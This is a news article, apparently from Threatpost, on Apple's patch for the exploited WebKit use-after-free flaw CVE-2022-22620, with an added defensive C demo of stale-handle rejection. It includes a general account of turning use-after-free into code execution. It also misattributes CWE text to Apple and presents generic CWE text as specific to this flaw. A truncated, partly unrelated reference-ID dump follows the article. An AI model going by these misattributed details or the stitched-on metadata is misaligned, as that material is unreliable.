Apple has patched yet another zero-day vulnerability, this time in its WebKit browser engine, that threat actors are already actively exploiting to compromise iPhones, iPads and macOS devices.
The zero-day, tracked as CVE-2022-22620, is a use-after-free issue, a class of bug that stems from incorrect handling of dynamically allocated memory while a program runs.
In the case of Apple’s zero-day, threat actors can execute arbitrary code on affected devices after they process maliciously crafted web content, the company said in a [description of the bug](<https://support.apple.com/en-us/HT213092>). The flaw also can lead to unexpected OS crashes.
“Apple is aware of a report that this issue may have been actively exploited,” the company wrote in its update notes.
The simplest way threat actors can exploit the flaw involves the system’s reuse of freed memory, according to the vulnerability’s description on the Common Weakness Enumeration website. “Referencing memory after it has been freed can cause a program to crash, use unexpected values or execute code,” according to the [post](<https://cwe.mitre.org/data/definitions/416.html>).
Exploiting previously freed memory can have various adverse consequences, “ranging from the corruption of valid data to the execution of arbitrary code, depending on the instantiation and timing of the flaw,” the description said.
## Memory Error
These types of errors typically have two common and sometimes overlapping causes: error conditions and other exceptional circumstances, and confusion over which part of the program is responsible for freeing the memory, according to the post.
In the case of CVE-2022-22620, the memory in question is validly allocated to another pointer at some point after it has been freed. The original, stale pointer to the freed memory is then used again, and now points somewhere inside the new allocation.
“As the data is changed, it corrupts the validly used memory; this induces undefined behavior in the process,” according to the post.
If the newly allocated data happens to hold a class – for example, in C++ code – various function pointers may be scattered within the heap data. “If one of these function pointers is overwritten with an address to valid shellcode, execution of arbitrary code can be achieved,” Apple’s post explained.
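The sequence the two preceding paragraphs describe (free, reallocate the same memory, then use the old reference, which now aliases a fresh object that may carry a function pointer) is deterministic to demonstrate only if stale references are caught rather than dereferenced. The following C program is an added example, not code from Apple, WebKit or the CWE entry; it uses a generation-tagged handle pool, a common use-after-free mitigation, so that a stale handle to a reused slot resolves to NULL instead of the new object's function pointer. All names (`Widget`, `Handle`, `widget_alloc`, `widget_free`, `widget_dispatch`, the four-slot pool) are assumptions made for the illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical heap object carrying an indirect-call target, standing in for
 * a C++ object whose function pointers live in heap data (see the article). */
typedef struct {
    void (*on_event)(int);
    int payload;
} Widget;

#define POOL_SLOTS 4

/* Each slot remembers how many times it has been freed; a handle that was
 * minted for an earlier generation can no longer resolve to the slot. */
typedef struct {
    Widget   obj;
    uint32_t generation;   /* bumped on every free */
    int      live;
} Slot;

typedef struct { uint32_t index; uint32_t generation; } Handle;

static Slot pool[POOL_SLOTS];   /* constructed toy allocator, not a real heap */

/* First-fit allocation: a freed slot is reused immediately, which is exactly
 * the reuse pattern a use-after-free relies on. */
static Handle widget_alloc(void) {
    for (uint32_t i = 0; i < POOL_SLOTS; i++) {
        if (!pool[i].live) {
            pool[i].live = 1;
            memset(&pool[i].obj, 0, sizeof pool[i].obj);
            return (Handle){ i, pool[i].generation };
        }
    }
    return (Handle){ UINT32_MAX, 0 };   /* pool exhausted */
}

/* Resolve a handle; NULL for out-of-range, freed, or stale (old generation). */
static Widget *widget_get(Handle h) {
    if (h.index >= POOL_SLOTS) return NULL;
    Slot *s = &pool[h.index];
    if (!s->live || s->generation != h.generation) return NULL;
    return &s->obj;
}

/* Returns 1 on success, 0 if the handle is stale (so a double free is refused). */
static int widget_free(Handle h) {
    if (widget_get(h) == NULL) return 0;
    Slot *s = &pool[h.index];
    s->live = 0;
    s->generation++;
    memset(&s->obj, 0, sizeof s->obj);   /* never leave a dangling function pointer behind */
    return 1;
}

static int dispatched;
static void handler(int v) { dispatched = v; }

/* Indirect call through the object; returns 1 if the call happened, 0 if the
 * handle was rejected. With raw pointers this is where a stale reference
 * would call through whatever the new allocation put in on_event. */
static int widget_dispatch(Handle h, int v) {
    Widget *w = widget_get(h);
    if (w == NULL || w->on_event == NULL) return 0;
    w->on_event(v);
    return 1;
}

/* The article's scenario: free, reallocate into the same slot, use the old
 * reference. Returns 1 when the stale handle and the double free are both
 * rejected while the fresh handle still works. */
static int demo_stale_reference_rejected(void) {
    Handle old = widget_alloc();
    widget_get(old)->on_event = handler;
    widget_free(old);

    Handle fresh = widget_alloc();           /* reuses the slot just freed */
    Widget *n = widget_get(fresh);
    n->on_event = handler;
    n->payload  = 42;

    int same_slot           = (old.index == fresh.index);
    int stale_rejected      = (widget_get(old) == NULL) && (widget_dispatch(old, 7) == 0);
    int double_free_refused = (widget_free(old) == 0);
    int fresh_works         = widget_dispatch(fresh, 9) && (dispatched == 9);
    widget_free(fresh);
    return same_slot && stale_rejected && double_free_refused && fresh_works;
}

int main(void) {
    printf("stale reference rejected: %s\n",
           demo_stale_reference_rejected() ? "yes" : "no");
    return 0;
}
```

The point of the generation counter is that reuse of the slot is allowed (allocators want that for performance) while the old reference cannot follow it: the slot index matches, so a raw pointer would silently alias the new `Widget`, but the generation does not, so the lookup fails closed.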
## Numerous Devices Affected
Apple released separate security updates for its products to address the issue – [macOS Monterey 12.2.1](<https://support.apple.com/en-us/HT213092>), [iOS 15.3.1 and iPadOS 15.3.1](<https://support.apple.com/en-us/HT213093>). Both updates improve how the OSes manage memory.
The flaw affects numerous Apple devices, including iPhone 6s and later; all iPad Pro models, iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch 7th generation. It also affects desktops and notebooks running macOS Monterey.
The update is the second time this year that Apple has had to issue a patch for a zero-day. [Last month](<https://threatpost.com/apple-zero-day-security-exploited/178040/>), the company also had to patch a memory issue – a zero-day flaw also affecting iOS, iPadOS and macOS Monterey, tracked as [CVE-2022-22587](<https://packetstormsecurity.com/files/cve/CVE-2022-22587>). Attackers could exploit that bug using a malicious app to execute arbitrary code with kernel privileges.
At the same time, the company patched another WebKit zero-day tracked as [CVE-2022-22594](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22594>). The information-disclosure issue affects browsers for macOS, iOS and iPadOS and allows a snooping website to find out information about other tabs a user might have open.
Last year Apple also patched several zero-day vulnerabilities, including [a zero-click zero-day](<https://threatpost.com/apple-emergency-fix-nso-zero-click-zero-day/169416/>) exploited by the NSO Group’s Pegasus spyware and [a memory-corruption flaw](<https://threatpost.com/apple-patches-actively-exploited-zero-day-in-ios-macos/168177/>) in its iOS and macOS platforms that could allow for system takeover.
## How to Force an Update if Necessary
As is typical for Apple, it didn’t disclose many details of the vulnerability and won’t until the investigation is completed. At any rate, “the majority of users have the patches installed,” pointed out Kaspersky in an early morning Friday [post](<https://www.kaspersky.com/blog/webkit-vulnerability-cve-2022-22620/43650/>). “Simply put, the most likely attack scenario is an infection of an iPhone or iPad device after visiting a malicious web page,” noted the security firm’s post.
Installing the iOS 15.3.1 and iPadOS 15.3.1 updates will protect your device, though it does need to be connected to a Wi-Fi network in order to install the patch.
For devices that aren’t yet showing that the update is ready to be installed, Kaspersky advised that systems can be forced into updating faster by going to system settings (Settings → General → Software update) and checking the availability of software updates.
_021122 09:25 update: Added content from Kaspersky’s post._
{"type": "securelist", "idList": ["SECURELIST:7A375F44156FACA25A0B3990F2CD73C1", "SECURELIST:9CC623A02615C07A9CEABD0C58DE7931"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1577-1", "OPENSUSE-SU-2021:1586-1", "OPENSUSE-SU-2021:1601-1", "OPENSUSE-SU-2021:3999-1", "OPENSUSE-SU-2021:4094-1", "OPENSUSE-SU-2021:4107-1", "OPENSUSE-SU-2021:4109-1"]}, {"type": "symantec", "idList": ["SMNTC-19793"]}, {"type": "thn", "idList": ["THN:2656971C06C4E3D4B0A8C0AC02BBB775", "THN:5BAE3325983F971D1108722C454FF9AB", "THN:5CB7AEBFFE369D293598A4FDBFDFCEE3", "THN:602D65D576B090BAC4B0C96998F8F922", "THN:668DE2C9CFD709125451AF8F3FE12E6C", "THN:686DDFA07B415C41BA7AB9B8970557EF", "THN:76D7572EDBE770410D6F0518DAD8B0AD", "THN:833B2B9623F1C64D20868B947E8BE4E0", "THN:83D31EE6B3E59778D812B3B7E67D7CD6", "THN:933FE23273AB5250B949633A337D44E1", "THN:AFF2BD38CB9578D0F4CA96A145933627", "THN:DCB20559AE0C35EB864725D482E268C2"]}, {"type": "threatpost", "idList": ["THREATPOST:065F7608AC06475E765018E97F14998D", "THREATPOST:10D0F1DDDD6C211DA3CE6395900B7C54", "THREATPOST:187B01687ED5D3975CD6E42E84DD9B13", "THREATPOST:27C5AA551B5793DEA8848FB76DE52B32", "THREATPOST:34D98758A035C36FED68DDD940415845", "THREATPOST:38E8D69F26ADB15A989532924B2A98C4", "THREATPOST:3A5F59D56E40560C393A3F69A362A31B", "THREATPOST:46837E7270195429E1D891848E911254", "THREATPOST:49177F7B5015CE94637C97F64C2D4138", "THREATPOST:4D63851D1493E3861204B674ADBC7F01", "THREATPOST:5B9D3D8DB4BFEDE846215C1877B275ED", "THREATPOST:5CCE0C2607242B16B2880B331167526C", "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "THREATPOST:89AA48C3C48FA427AB660EDEE6DBCBE2", "THREATPOST:8A372065BFA1E6839DAF0386E9D8A1F5", "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "THREATPOST:B318814572E066732E6C32CC147D95E2", "THREATPOST:B8BEEE8F3BDF1B6AD88639DA8C4595EA", "THREATPOST:D098942E4435832E619282E1B92C9E0F"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:C927C873A9E9A7AF6B74D64EFAFA6B02"]}, {"type": "typo3", "idList": ["TYPO3-PSA-2021-004"]}, {"type": "ubuntu", 
"idList": ["USN-5192-1", "USN-5192-2", "USN-5197-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-44228"]}, {"type": "vmware", "idList": ["VMSA-2021-0028.10", "VMSA-2021-0028.9"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:060FBB90648BCDE11554492408AE89C8", "WALLARMLAB:2AAA5E62EED6807B93FB40361B4927CB", "WALLARMLAB:90D3FFE69FF928689D36310EF8B1C4F3", "WALLARMLAB:E86F01AF50087BEB03AAB46947CDE884"]}, {"type": "zdt", "idList": ["1337DAY-ID-37135", "1337DAY-ID-37136", "1337DAY-ID-37257"]}]}, "dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:65F0FA2139A357151F74FA41EF42B50F", "AKAMAIBLOG:7E872DA472DB19F259EC6E0D8CA018FF", "AKAMAIBLOG:B0985AEDEB4DAED26BDA30B9488D329D", "AKAMAIBLOG:B0DBF0121097FA293565FB7E66E09AB3"]}, {"type": "almalinux", "idList": ["ALSA-2022:1777"]}, {"type": "amazon", "idList": ["ALAS-2021-1553", "ALAS-2021-1554", "ALAS-2022-1580", "ALAS-2022-1601", "ALAS2-2021-1730", "ALAS2-2021-1731", "ALAS2-2021-1732", "ALAS2-2022-1739", "ALAS2-2022-1773", "ALAS2-2022-1806"]}, {"type": "amd", "idList": ["AMD-SB-1034"]}, {"type": "apple", "idList": ["APPLE:02740BCB30C345C4CD19795FBD8FD739", "APPLE:16752A28F5EAA2C135C9F24F2AA98541", "APPLE:251C897D47AD6A2DB0B7E3792A81C425", "APPLE:4A4048A18F34C672CBA0BD1BE526B92E", "APPLE:52E627AE8868F50352A397AD32DB5373", "APPLE:99DB3A974D6753D61A4B9F20ACDACD13", "APPLE:99E4CCCCE2782591968B06F1CD58BA2D", "APPLE:A9EDC29DCEC8CDEC250D783F058D98B8", "APPLE:EC977EE6AFB398593194B16BEAF964E4", "APPLE:EF619761E522E15BAB653ACD81383CBF", "APPLE:F2C11F0D9C46752E77BED53DE4EE5912"]}, {"type": "arista", "idList": ["ARISTA:0070"]}, {"type": "atlassian", "idList": ["CRUC-8529", "FE-7368"]}, {"type": "attackerkb", "idList": ["AKB:0B6C144F-2E5A-4D5E-B629-E45C2530CB94", "AKB:12497ECD-6565-46DB-AD65-2F25827C7711", "AKB:21AD0A36-A0AA-486B-A379-B47156286E9E", "AKB:3191CCF9-DA8E-43DF-8152-1E3A5D1A3C45", "AKB:398CAD69-31E4-4276-B510-D93B2C648A74", "AKB:B1318EAC-2E60-4695-B63B-2D10DAAA5B0E", 
"AKB:F2A441BA-2246-446C-9B34-400B2F3DD77B", "AKB:F7DBB7CA-A582-4BC6-87C3-ACA4DBC4F58B"]}, {"type": "avleonov", "idList": ["AVLEONOV:469525DB37AAC7A2242EE80C1BCBC8DB", "AVLEONOV:89C75127789AC2C132A3AA403F035902", "AVLEONOV:FEA9E4494A95F04BD598867C8CA5D246"]}, {"type": "cert", "idList": ["VU:930724"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0936", "CPAI-2022-0325"]}, {"type": "checkpoint_security", "idList": ["CPS:SK176865"]}, {"type": "cisa", "idList": ["CISA:006B1DC6A817621E16EEB4560519A418", "CISA:380E63A9EAAD85FA1950A6973017E11B", "CISA:45B6D68A097309E99D8E7192B1E8A8BE", "CISA:6C962B804E593B231FDE50912F4D093A", "CISA:7135D71F3A4288760C8E71D4E553A3B4", "CISA:8367DA0C1A6F51FB2D817745BB204C48", "CISA:918B5EC3622C761B0424597D3F7AFF7C", "CISA:920F1DA8584B18459D4963D91C8DDA33", "CISA:F0D9A1ED5C31628B8E6D1E5F3AD609C4", "CISA:F3C70D08CAE58CBD29A5E5ED6B2AE473"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2021-44228", "CISA-KEV-CVE-2022-22587", "CISA-KEV-CVE-2022-22620"]}, {"type": "cisco", "idList": ["CISCO-SA-APACHE-LOG4J-QRUKNEBD"]}, {"type": "citrix", "idList": ["CTX335705"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:690C01663F820378948F8CF2E2405F72"]}, {"type": "cve", "idList": ["CVE-2021-3100", "CVE-2021-4104", "CVE-2021-4125", "CVE-2021-44228", "CVE-2021-44530", "CVE-2021-45046", "CVE-2022-0070", "CVE-2022-22587", "CVE-2022-22594", "CVE-2022-22620", "CVE-2022-23848", "CVE-2022-33915"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2842-1:95CB4", "DEBIAN:DSA-5020-1:32A64", "DEBIAN:DSA-5022-1:D26EE", "DEBIAN:DSA-5083-1:1231B", "DEBIAN:DSA-5084-1:8E2FE"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-4104", "DEBIANCVE:CVE-2021-44228", "DEBIANCVE:CVE-2021-45046", "DEBIANCVE:CVE-2022-22594", "DEBIANCVE:CVE-2022-22620"]}, {"type": "exploitdb", "idList": ["EDB-ID:50590", "EDB-ID:50592"]}, {"type": "f5", "idList": ["F5:K19026212", "F5:K24554520", "F5:K32171392", "F5:K34002344"]}, {"type": "fedora", "idList": ["FEDORA:0A343304CB93", 
"FEDORA:548FD3102AB0", "FEDORA:59AA230A7074", "FEDORA:95A5B306879A", "FEDORA:A5A703103140"]}, {"type": "fortinet", "idList": ["FG-IR-21-245"]}, {"type": "freebsd", "idList": ["1EA05BB8-5D74-11EC-BB1E-001517A2E1A4", "3FADD7E4-F8FB-45A0-A218-8FD6423C338F", "4B1AC5A3-5BD4-11EC-8602-589CFC007716", "515DF85A-5CD7-11EC-A16D-001517A2E1A4", "650734B2-7665-4170-9A0A-EECED5E10A5E", "93A1C9A7-5BEF-11EC-A47A-001517A2E1A4"]}, {"type": "gentoo", "idList": ["GLSA-202208-39"]}, {"type": "github", "idList": ["GHSA-3QPM-H9CH-PX3C", "GHSA-7RJR-3Q55-VV33", "GHSA-FP5R-V3W9-4333", "GHSA-J3CH-VJPH-8Q6V", "GHSA-J7C3-96RF-JRRP", "GHSA-JFH8-C2JP-5V3Q", "GHSA-MF4F-J588-5XM8", "GHSA-V57X-GXFJ-484Q", "GITHUB:070AFCDE1A9C584654244E41373D86D8", "GITHUB:D32BE0B8A571761A967462652837D28F"]}, {"type": "githubexploit", "idList": ["00264586-32AF-5469-819B-90FBDA0B6FF2", "00423BD1-64DA-5DB0-848E-1BACC0883E15", "0099FB22-A94E-5D32-9BC4-2EC6D5CFFA9C", "016A0841-D1FF-5056-B062-0D08FCE624CB", "0241DC13-63CB-580C-BDC6-78F8BB03567D", "024D29D3-309F-5B7F-B8C9-2AF149F9A213", "030066BA-6C48-5AD9-9EAF-11DECB6A3930", "034AFC0C-D411-5F4A-BBAB-630A6C972933", "03C230DA-F801-5660-BF8E-AB8F44E2755C", "0420DA06-BC6E-5B30-8BA3-E30BDE351E15", "0568D2CD-87AF-5D34-AA65-868B1DDA0A89", "0577D04A-4517-5872-B4C0-E45DD6246D88", "066BA250-177D-5017-9AC2-6B948A465ABC", "06D271D5-7A61-5692-9778-7F521D52F980", "0793D7AB-F57C-5832-B456-4057704CAEC9", "07C462E5-20A3-5023-B363-47E1B0C1AE4E", "09509FA9-9FC3-5B64-900D-F0842DC8BCF7", "09F9BA9F-83A2-52EF-81A0-214FCD9E240D", "0A26B4F0-3175-58BE-9CE7-133C9D85E181", "0ABA9FB5-93DD-59F1-9580-232DBFBB4AD8", "0B596CD2-49C7-50A8-A43C-8DE3027EC2B7", "0BC62E37-D6E2-5B2C-BF89-3E00D98D2E30", "0C98B78F-B467-5298-825B-05ECB4EE2653", "0CBB2E72-C52F-59B6-BD73-DBDD206C4C35", "0CEA12C7-97F6-5BF5-88FF-6797542A037F", "0D243A34-B42E-5007-90D0-A30ECABDA204", "0D4B651A-4424-55FE-B496-1BB733DE7EE2", "0D6ADE4E-8BA2-5BA9-94CB-ED90234A9B5C", "0E43C674-363B-53C2-8686-6F412A995AF4", 
"0E47338D-BDC0-510A-BC15-093F2E1DEF2C", "0E8471F7-D213-552B-ABD8-B3B1FAD4B910", "1097EF60-FC77-5135-B92B-4A84B46FABAF", "11719BED-E629-5C79-944E-7E40BBFC460C", "126A30D2-0273-510B-B34A-DF7AE6E0C1C0", "129B39DD-AB9E-54F0-B6B4-5EA17F29B7DF", "12AAE278-1B08-5F3E-AC28-8EC928D3D7C8", "13542749-F70C-5BAA-A20C-8A464D612535", "1370FA0C-A273-5E82-9EEB-7E2E5628D23E", "13EDAA06-F1A5-5097-AD3A-3D6129C325A7", "141F2E38-979B-50B5-B649-96785B255523", "14482532-2406-58DF-89FF-30B085015257", "149F99C3-6B62-5255-8DA6-A0370E6ED5F7", "14E4E272-9457-53A0-ADD5-F91385D04FCD", "161B70B2-DFA5-54B6-A4CE-45B79999AAC6", "16B2ABBF-5997-58A1-A4C9-0161F64D116C", "16C11F1E-B5B4-508E-8238-6BF3458B34D3", "16EB55EE-7CC4-58C7-86AC-E9FD7066B5F1", "170912E2-BB33-5CB8-AD90-C0A737FCAC5E", "17C204F9-DD70-5EFB-89D4-B642E65FAF99", "1AD6F414-6637-555A-AA79-BEE90EDB10AB", "1B11A8A4-B07C-580C-AF38-33A50B17B19A", "1B8CBBEC-5ABA-5792-8D2A-A51EB4CC6352", "1C354B89-0050-508B-98F4-B43CBD84F364", "1CC6B535-3451-5066-8C2E-94551FEC545E", "1CCC4512-40AB-5F72-9913-3D894DB4676F", "1D3D13FB-46D9-572A-A304-FEEC4619D37B", "1E085D9B-26F5-5960-938C-AEB76BCE61D8", "1E62A076-94ED-5061-AE4F-432BB8D7A59C", "210D354B-2338-5AA4-BB87-981C2D2BAA06", "21AACF78-8053-529E-909E-B6D5158008AC", "21B5671D-2A35-52FF-9702-380A32B96260", "21F23081-849E-5B0D-AB61-A8EB37CA0B38", "22AAF71B-053F-5E71-9F26-039C48FCCD62", "22C2FC0C-2C78-5EF7-B21B-5B76E82E2E99", "22C736D4-4179-585F-990B-A40436F65461", "231364E1-A2B1-558A-B805-F242AA97B13F", "23A2D479-181C-599C-9C0F-9A2FF201348F", "2421E200-716C-5F29-84C0-DD8B9C41D92E", "24682F53-DE0E-5967-AAC7-98806644A14C", "24751999-698F-5052-988C-193144F85A39", "254068B4-97B4-5DCF-A60F-5206B6DD230E", "26FD2B5F-2952-5624-8CB5-3ECD4480DA87", "27760EBF-2681-5AF4-B884-18C8BED5127A", "27D73012-7283-5C8D-8197-BBAE1964DEE3", "29A41C2D-FF26-591A-A88B-DDB396742BBC", "2A95146E-A404-5015-9D39-293C8EAFF4B6", "2AA77664-83AA-50B1-9F4E-37CC67A5CFAC", "2AF28508-1272-5281-BDB7-B44D3EFC7C72", "2AF7350D-AB79-5AB5-8AF9-0F351CE13D30", 
"2B297EB1-A602-5F7B-B21B-C34BC6EB4308", "2D2BE5CB-742A-5912-9D88-75365533F9E2", "2E7FF2D4-97E7-54F5-A5C8-EACD22FCF303", "2E946B1D-12B1-56D1-A72E-A3026C240B1D", "2EACBFB9-2956-564B-A859-6C85EF9F785A", "2F792C33-6CC6-58F1-9166-4DEA421DE2C3", "2F83846E-DF16-5074-98CB-01158DE1C6C6", "30BD2114-A602-52D3-908F-8B66A46F1A8C", "30C6DF99-400E-539F-AA8D-39E7407F4796", "31E7D7EA-2E1F-59D8-8BD7-81B8A4894F91", "32BB43C3-F80D-5CBF-83AD-55BD38C2A440", "342CC1B7-6E24-5767-A7B1-90B95A91B503", "34DFC7F1-8012-5B3A-B9F1-EFEDB5F89D1D", "3549B000-260E-5A24-9573-935F898D149C", "356A7EC9-4E47-52B9-856C-0215B3D9C70E", "35A70212-DFFC-5B38-8294-2B835B8080DE", "371D4A15-51B5-520B-B31D-856E557695FD", "3734D8ED-657E-5585-B181-DE9BE2D84456", "38AF0E71-397C-5A1E-B67C-5514D8F8ABC8", "39A13697-AF09-5E14-9DE2-045005EA9D85", "39D0749D-74E3-5D08-804A-6E7E52BCE692", "3A118B0C-1B94-5CA7-81D3-2A3230EB4DC9", "3A1D442B-2B5B-5DEA-9276-9A9B6C06C9DF", "3A8F706B-1F40-5DAB-AB25-BA023D568AFA", "3AAA878D-C72A-52A0-A5B6-0977BAF6F01D", "3ACF6BFE-C853-50C6-BD49-B76794B8BA53", "3B7408B1-9041-550E-9CB8-83E5F609C37B", "3D8E1FE1-17FA-5A92-B109-DEDB55A6BEAB", "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "3DFE8091-03AE-565B-A198-BD509784502C", "3E142E8E-743B-5786-9EB8-0FED1933F71D", "3EA1CA63-F1F5-5A86-AB97-E327DAE18E93", "3FB46D12-73E5-58EF-BC2A-4FC103B8FF72", "4066A0A4-284D-5ECC-A476-ADDA61AF9A76", "4096BFF5-03AE-5DA0-8AD6-85D69E2570C1", "40C633CE-4DD0-586D-8773-760E9A70FFBD", "4142DC43-FEB5-5B62-B8C7-B2A4DEB336A6", "42098CCD-C708-53FC-B3CD-5A8356B69359", "423CC97A-8BDD-56B9-9449-FC05A902AEC1", "4288177C-C609-5D55-A845-D6785929AB4D", "43159333-A26E-5929-A289-0C84DDCF9DEA", "43A7C9D3-EBB3-57B1-B8FB-C651B36501C2", "43CEFD04-EB9B-5765-AB94-8FF76127F1F6", "44463794-7940-582A-AFFF-676628A86A72", "444C7644-3DE2-57B2-ACF8-C2B157E07580", "44DBFE24-1B30-510A-8291-B7043C7FF654", "4557B39D-1DE6-59FA-AF6C-935E8BB15AE5", "45E71437-8181-5EB7-91BD-D6E4343DA0AB", "473FFDA9-E615-53B6-9A81-F98A1ABD700E", "47670E23-A165-5F5D-8C90-5C76DA1ADFEE", 
"479EB930-7609-5244-8E16-0D8689304D86", "4804958E-7699-5226-91C3-8110A4CBAB18", "48821FC8-9320-5568-88A3-9B2CC655ADAC", "4A0D603B-6526-5D1E-BADC-55B4775C354B", "4B070EB0-B690-5547-8809-F1A697118957", "4B1180FB-F4A3-5FCD-A8D2-65364D1EA9EC", "4B30BFBE-6FDC-5580-9C76-65EA4EBA5DAC", "4B38D813-5C4B-586B-930A-FDDD0FFF304B", "4BD74B8C-D553-57C6-AB15-6B899401AAA4", "4C6A108D-3631-56AD-8C3B-9677A228693B", "4CB3AC5D-871A-50AC-9037-FF9B2CBD474A", "4DBC05D1-8178-5715-953D-61ECC89104F4", "4F11FB83-F6EC-5ED2-B08D-9D86D6104DC7", "4F57CC9C-B908-544E-92E7-92A49DE89B00", "4F757EF2-574B-55C7-A017-51DC8BB28C31", "4FBD8560-2AEB-5AD2-9CA3-4A72DEDDE929", "51879B5C-E36F-52B7-B92C-DBA73A21F67D", "5233D0F2-69A2-5220-8016-07D66C226F01", "52BA1465-B7E9-59C1-A20F-E38A5EAE272D", "52E35A88-6217-55CC-B812-4EE83CECD8EB", "53A3C2F6-6EF2-52C1-924B-F3A9C95C2A88", "542348EC-7B83-50E0-8F9B-B6AE9968059F", "547FC254-3B26-59EC-AF4D-E5954678AC3D", "54AB8DD9-4A52-50E4-9EE2-046EBD899FFD", "54E7D93D-9216-5EDE-A4AD-8324A367E67B", "54FE5E76-EAF4-5D84-B37F-06F12A6AFF71", "553C3CC1-0126-5554-8BE0-5F577271EBF9", "55AD7FBC-06FB-5D26-A3A6-F9E9D63D45AC", "5644D9A0-3A8F-52F3-AE3E-300C79911A07", "57742B88-2AA6-5788-825F-92A73CA85718", "578E61DA-1B13-5170-9DAC-60D30F7F8C99", "58ACC402-1947-5FE3-9D08-021A4EFEC48A", "5A5A28A1-2601-54F3-BA06-BCFF1A9DCCA5", "5ABB537C-AD08-57E9-9A29-E747D7C29DE9", "5B1D95CD-139F-5304-8B13-BB4EDD912DFA", "5B342AC3-2399-581E-BB6A-2EF19BC35B0C", "5B6C990F-05A3-5D83-83DF-386A34FB8560", "5C040112-8DE7-57AA-B52D-BDD1965D02E3", "5C116D88-E2CC-5BC3-9A71-3174292E227D", "5CEF4882-D1D5-5861-944F-34E8868BF986", "5D72C8DC-DFFD-56F3-A7AC-9FA83C48F460", "5E633D2D-95D0-5498-840F-EA92BF2C5A00", "5E9FB294-1E29-5DE8-A6F6-6D25B08A31DC", "5FB1E3FD-68C6-50CF-85EF-DBFC0B133C24", "5FC55783-FDF5-5AD8-98B2-C1CBFB4EFCCA", "5FDC1BB6-C937-5F78-BB2D-71584272E00A", "6083DCC3-CA9C-58A4-9FBC-983DF1E52584", "608B43BB-B31C-5B8A-A962-A58902AEBF2E", "61AC9232-A772-5D63-9DFC-BFE4976418C7", "62F5F8D4-29D7-5B5C-82BC-3D56E7E8D027", 
"634605C6-F76D-5EDD-9986-EC4EC593168D", "63500AE8-A10A-5388-B314-001A4CFBDFBD", "6413E08F-7E60-50ED-932E-527F515A6C19", "645452DF-222B-51AD-963D-DB002A1FC803", "65EB18B2-8DBB-5A70-9080-C6DA4451D7E7", "6600C311-30E5-566D-98F1-AC47E752EBEA", "67E20854-0E30-5FC1-9F24-6A60531BAFF6", "68DCAE72-CB86-55B9-9CB6-653918238C2B", "6A34D9C3-C290-5763-BAF4-F1D6351C4BA2", "6A4495E8-D723-5923-BB6A-B9EA838CF69B", "6AC0E68D-D6F7-55D9-A281-30D7E76D7556", "6BC5CBC6-5A96-5743-8FB7-CEDDF527C52A", "6CC29A1A-24F4-5961-89F9-E7B824C6F37C", "6D93189D-E2D8-5571-88D5-D778E1CB9C23", "6DA59A94-0CD1-5357-8F01-2BF3230F9017", "6E4D24C6-CAF4-5CCB-83A7-844F830C86FC", "6F10C51B-BF15-522B-B1CB-BA95361D556E", "6F20D8B7-C252-5759-B02B-F8E2C9D42E38", "6F251270-3935-58F4-835C-C9D26FA97CD6", "6F7E4100-F6E7-5C57-8A1B-89F03DCC53A6", "6F93E170-75AD-5F5C-B7CC-6C4CEAA695AB", "700E9EFF-DFA6-504F-8DD1-FB1A62E01721", "70582B5B-E1E6-5767-94A6-39740A96A052", "70EDCB3B-9053-5056-980C-AC3123913F04", "71594B4E-D7FE-534F-8E37-71A1EE08E2E9", "71D962ED-2525-53CE-88D0-D8CD92FB0C02", "743571E7-B8EE-5E77-B047-E2E001379ACE", "74A4D09D-9483-5842-A44A-9DA17D085AF5", "75180259-16B4-5B60-9913-BFC9A306560A", "75876A50-BD9B-5991-9E42-7A343A97C890", "76E7C0B8-1EE5-543A-A48E-E3AAEAA8BFF6", "76F0B9E8-D173-5309-9826-5880F8B35043", "76F6F494-8855-5F94-9675-4474FFFA65A1", "77BE16D3-FEC9-51E3-ADB4-250D5BE6CBD2", "780AD920-FF08-55C6-84C8-A8536C6F5527", "7865A97A-CD10-5E45-9429-CF5F72A6952B", "78C2256A-8ABF-5E34-9268-2EEC0C09E567", "78CE8E59-092E-5214-9D02-A3F5F62F22E9", "7948E878-9BFE-5FEB-90AE-14C32290452F", "798B7BE8-4F94-5D15-A93C-CFE73333BDC5", "799DA5B7-BCF7-56C7-80E8-EAF2351D78F1", "7A3F31B5-D371-54B1-A81B-3863FBC71F0E", "7B2DA44B-D36F-56A4-B4D8-376B8D2F5586", "7B48A97D-242D-55E0-8A13-BD2727C1261F", "7B9BDDBA-81E8-5739-B3F7-419C0D6E2316", "7BB30379-8D57-5FD7-A90C-1A24B1846A23", "7BCC0C24-A1F7-531E-B1BA-342D21C9AF02", "7D70E261-1C9F-517E-88BB-62776C7EE1F1", "7D82EDFA-5384-53C5-96AD-A99E88471129", "7F93036E-3036-56D2-97C5-CFAEAB8DB6F2", 
